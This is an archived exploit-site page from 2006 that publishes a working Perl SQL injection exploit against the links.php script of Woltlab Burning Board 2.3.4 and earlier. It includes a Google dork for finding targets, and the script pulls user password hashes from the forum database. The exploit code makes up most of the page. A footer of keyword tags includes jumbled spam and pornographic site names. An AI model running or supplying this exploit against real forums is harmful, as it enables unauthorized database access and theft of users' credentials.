about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Woltlab Burning Board <= 2.3.4 (links.php) SQL Injection Exploit




2006-05-20 Woltlab Burning Board <= 2.3.4 (links.php) SQL Injection Exploit
Rated as : High Risk

#!/usr/bin/perl

use IO::Socket;

print q{
################################################################################
##                                                                        
   ##

##  Woltlab Burning Board 2.3.4 <= "links.php" <= SQL
Injection Exploit       ##
##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -   
   ##
##  Exploit by       |  LoK-Crew                                          
   ##

##  Vulnerability by |  x82                                               
   ##
##  Googledork       |  inurl:/wbb2/links.php?cat                         
   ##
##  Usage            |  links.pl [server] [path]                          
   ##

##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -   
   ##
##                                                                        
   ##
################################################################################


};

$webpage = $ARGV[0];
$directory = $ARGV[1];

if (!$webpage||!$directory) { die "[+] Exploit failed\n"; }

$wbb_dir =
"http://".$webpage.$directory."links.php?cat=31337+union+select+password,userid+from+bb1_users";


$sock = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>"$webpage", PeerPort=>"80") || die
"[+] Can't connect to Server\n";
print "[+] Exploiting....\n";

print $sock "GET $wbb_dir HTTP/1.1\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Hacker\n";
print $sock "Host: $webpage\n";
print $sock "Connection: close\n\n";


while ($answer = <$sock>) {
	if ($answer =~
/(................................)<\/b><\/font>/) {
		print "[+] Hash: $1\n";
		exit();
	}
	if ($answer =~ /SQL-DATABASE ERROR/) {

		break;
	}
}

$wbb_dir =
"http://".$webpage.$directory."links.php?cat=31337+union+select+password,userid+from+bb1_users";
close($sock);

$sock = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>"$webpage", PeerPort=>"80") || die
"[+] Can't connect to Server\n";

print $sock "GET $wbb_dir HTTP/1.1\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Hacker\n";
print $sock "Host: $webpage\n";
print $sock "Connection: close\n\n";


while ($answer = <$sock>) {
	if ($answer =~
/(................................)<\/b><\/font>/) {
		print "[+] Hash: $1\n";
		exit();
	}
	if ($answer =~ /SQL-DATABASE ERROR/) {

		print "[+] Try replacing bb1_users with bb2_users\n";
		break;
	}
}
close($sock);

print "[+] Exploit failed\n";
securitydot.net - 2006-05-20

Advertising

Copyright 2007, SecurityDot
Sun, 08 Nov 2009 08:35:30 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
exBB www.quanbe Dolphin Sm 200 /compo Crack //r/ admin hash Namatha vuln/explo boywanker 2.6.17 Imagenes x www.zend2. SEXCARTON. youpron.co www.sex18 hi.baidu.c swdf www.aijiam Forms 3D g www.videoc omn500 Www.sex.vi www.pinkwo www.vedose www.fantas www.tamils Novel Pitchersex xxxvido ax kose ir Www.89 sex lkoa032560 blueporno Display fr DuniaseX.c www.zhangt Www.89 sex Weptrick SOlaris FT www.sextam vulner ava ubuntu roo www.xiaohu www89.com, www.25791. www.4pigs. mambo+Remo mambo+Remo EJ3 TOPO ebru